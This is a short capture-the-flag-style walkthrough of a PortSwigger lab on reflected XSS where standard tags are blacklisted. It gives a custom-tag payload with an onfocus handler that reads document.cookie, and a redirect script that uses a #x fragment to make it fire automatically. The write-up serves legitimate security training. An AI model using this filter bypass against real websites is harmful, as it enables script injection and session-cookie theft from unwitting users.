Home PortSwigger Labs - Reflected XSS into HTML context with all tags blocked except custom ones

PortSwigger Labs - Reflected XSS into HTML context with all tags blocked except custom ones

Reflected XSS into HTML context with all tags blocked except custom ones


Link: https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-all-standard-tags-blocked


The value of the search parameter is reflected in the response. So, let’s test whether the input is not properly sanitized/escapade.

All tags are blacklisted except the custom ones. We can try to inject our own tag and trigger the payload on the onfocus event.

The custom tag and attributes are: <exploit id=x onfocus=alert(document.cookie); tabindex=1>.

The content of the file visited by the user to trigger our XSS is:

location = "https://acca1f861ec66b0381e0022700040079.web-security-academy.net/?search=<exploit+id%3dx+onfocus%3dalert(document.cookie);+tabindex%3d1>#x";

The user will be redirected to the vulnerable page and the #x will make the page focus on our custom tag, triggering the alert pop-up.

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